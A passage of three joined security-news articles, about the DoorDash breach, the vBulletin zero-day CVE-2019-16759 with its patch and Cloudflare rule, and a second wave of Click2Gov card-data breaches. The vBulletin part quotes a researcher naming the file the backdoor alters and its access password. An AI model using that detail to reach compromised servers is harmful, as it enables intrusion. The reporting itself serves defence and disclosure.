are not affected by this data breach. However, DoorDash has neither clarified the details of how the third party accessed the user’s data nor have they explained how the company came to know about the data breach. The blog post also does not throw any light on why the company took so long in detecting this security breach. Many users are indignant about DoorDash’s lack of detailing in the blog post. https://twitter.com/peterfrost/status/1177572308136976385 https://twitter.com/benrothke/status/1177339060282523648 Many people are also of the opinion that until substantial penalties are levied against these companies, data breaches will continue to occur. Many are of the opinion that companies should stop asking for personal information while confirming a customer. A user on Hacker News comments, “In other words... "We leaked a bunch of your personal information, but at least it's not enough data to steal your money!" All of these leaks have the cumulative effect of making ineffective very commonly used security verification questions: "Can I verify that last 4 of your social? And the last 4 of your credit card?" How long will it take for us to accept that this kind of data can no longer be assumed private? The sooner, the better, mainly so companies stop using it as a secondary form of identity verification.” Head over to the DoorDash blog for more details about the data breach. StockX confirms a data breach impacting 6.8 million customers Following Capital One data breach, GitHub gets sued and AWS security questioned by a U.S. Senator Facebook fails to fend off a lawsuit over a data breach of nearly 30 million users Cloudflare finally launches Warp and Warp Plus after a delay of more than five months Tesla Software Version 10.0 adds Smart Summon, in-car karaoke, Netflix, Hulu, and Spotify streaming

Update: Six days after an anonymous researcher had disclosed a zero-day pre-auth remote code execution vulnerability in vBulletin, Cloudflare has deployed a new rule within their Cloudflare Specials Rulesets (ruleId: 100166).  The Cloudflare team states, “We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10. Protection against common RCE attacks is a standard feature of Cloudflare's Managed Rulesets.” Cloudflare customers with Managed Rulesets and Cloudflare Specials can be protected against this vulnerability by enabling the WAF Managed Rulesets in the Firewall tab of Cloudflare. Head over to the Cloudflare blog for more details about Cloudflare’s protection against this vulnerability. On September 23rd, an anonymous researcher published a zero-day pre-authentication remote code execution vulnerability in vBulletin, which allows an attacker to remotely execute malicious shell commands on any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability was disclosed on Full Disclosure, a public access mailing list. Yesterday, the vBulletin team issued a security patch for this vulnerability, which is now tracked under the CVE-2019-16759. How does the zero-day vulnerability in vBulletin work Ryan Seguin, a research engineer at Tenable explains in his blog that this vulnerability utilizes default vBulletin configurations. This enables an unauthenticated attacker to send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. He further states, “These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.” Another security researcher, Troy Mursch of the Bad Packets security intelligence service told Arstechnica that the attackers are employing botnets to actively exploit vulnerable servers. The exploit, Mursch says, can modify the includes/vb5/frontend/controller/bbcode.php via the "sed" command to add a backdoor to the code. Mursch adds, “This is done by setting a “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site. The vulnerability itself has been regarded by some as a backdoor.” The vBulletin vulnerability is exploiting websites via the backdoor to build a list of bots that can configure supplementary ways of exploiting the infected hosts. The backdoor can infect the compromised hosts with DDoS malware and conduct denial-of-service attacks. It is not known yet if the anonymous publisher of this vulnerability had reported the vulnerability to the vBulletin team or not. Another possibility is that the vBulletin team could not find a timely solution to this issue, encouraging the user to publish the vulnerability on Full Disclosure. The anonymous researcher has published about the zero-day vulnerability from an unnamed email service. Why is a vulnerability in vBulletin so severe? vBulletin, a popular web forum software package has around 0.1% market share of all the running forums across the internet. Though the percentage looks small, the vulnerability in vBulletin can impact billions of internet users, reports ZDNet. vBulletin is designed to collect user information about registered users. “While billions of internet sites don't store any info about users, a handful of online forums could very easily store data on most internet users. Therefore, a market share of 0.1% is actually pretty significant, when we factor in how many users could be registered on these forums.” Steam, EA, Zynga, NASA, Sony, BodyBuilding.com, the Houston Texans, and the Denver Broncos are some of the customers that use the vBulletin server. Yesterday, GreyNoise, a cybersecurity company has tweeted that the vBulletin hackers are actively using this vulnerability to attack vulnerable forums. https://twitter.com/GreyNoiseIO/status/1176898873622781954 According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability is known for many years. https://twitter.com/cBekrar/status/1176803541047861249 The vBulletin team has already issued a patch for CVE-2019-16759 for vBulletin versions 5.5.2, 5.5.3, and 5.5.4. Users on earlier versions of vBulletin 5.x are advised to update to one of the supported versions in order to implement the patch. The vBulletin cloud version has already updated and fixed this issue. Silicon-Interconnect Fabric is soon on its way to replace Printed Circuit Boards, new UCLA research claims Google Chrome Keystone update can render your Mac system unbootable ReactOS 0.4.12 releases with kernel improvements, Intel e1000 NIC driver support, and more

A vulnerable municipality software, Click2Gov, is known to be part of a breach involving eight cities last month, Threatpost reports. The Click2Gov software is used in self-service bill-paying portals used by utilities and community development organizations for paying parking tickets online etc. This is not the first time the software vulnerability has affected a huge bunch of people. The flaw was first discovered in December 2018, where using the vulnerable software, hackers compromised over 300,000 payment card records from dozens of cities across the United States and Canada between 2017 and late 2018. Also Read: Researchers reveal a vulnerability that can bypass payment limits in contactless Visa card Hackers are taking a second aim at Click2Gov The team of researchers at Gemini Advisory who covered the breach in 2018 have now observed a second wave of Click2Gov breaches beginning in August 2019 and affecting over 20,000 records from eight cities across the United States. The portals of six of the eight cities had been compromised in the initial breach. They also revealed that these user records have been offered for sale online via illicit markets. The impacted towns include Deerfield Beach, Fla., Palm Bay, Fla., Milton, Fla., Coral Springs. Fla., Bakersfield Calif., Pocatello Ida., Broken Arrow, Okla. and Ames, Iow “While many of the affected cities have patched their systems since the original breach, it is common for cybercriminals to strike the same targets twice. Thus, several of the same cities were affected in both waves of breaches,”  the Gemini Advisory researchers write in their official post. The researchers said, “Analysts confirmed that many of the affected towns were operating patched and up-to-date Click2Gov systems but were affected nonetheless. Given the success of the first campaign, which generated over $1.9 million in illicit revenue, the threat actors would likely have both the motive and the budget to conduct a second Click2Gov campaign,” they further added. Also Read: Apple Card, iPhone’s new payment system, is now available for select users According to a FireEye report published last year, in the 2018 attack, attackers compromised the Click2Gov webserver. Due to the vulnerability, the attacker was able to install a web shell, SJavaWebManage, and then upload a tool that allowed them to parse log files, retrieve payment card information and remove all log entries. Superion (now CentralSquare Technologies and owner of the Click2Gov software) acknowledged directly to Gemini Advisory that despite broad patch deployment the system remains vulnerable for an unknown reason. On similar lines of this year’s attack, researchers say “the portal remains a viable attack surface. These eight cities were in five states, but cardholders in all 50 states were affected. Some of these victims resided in different states but remotely transacted with the Click2Gov portal in affected cities, potentially due to past travels or to owning property in those cities.” Map depicting cities affected only by the original Click2Gov breach (yellow) and those affected by the second wave of Click2Gov breaches (blue). Source: Gemini Advisory These eight towns were contacted by Threatpost wherein most of them did not respond. However, some towns confirmed the breach in their Click2Gov utility payment portals. Some even took their Click2Gov portals offline shortly after contact. CentralSquare Technologies did not immediately comment on this scenario. To know more about this news in detail, read Gemini Advisory’s official post. Other news in security MITRE’s 2019 CWE Top 25 most dangerous software errors list released Emotet, a dangerous botnet spams malicious emails, “targets 66,000 unique emails for more than 30,000 domain names” reports BleepingComputer An unsecured Elasticsearch database exposes personal information of 20 million Ecuadoreans including 6.77M children under 18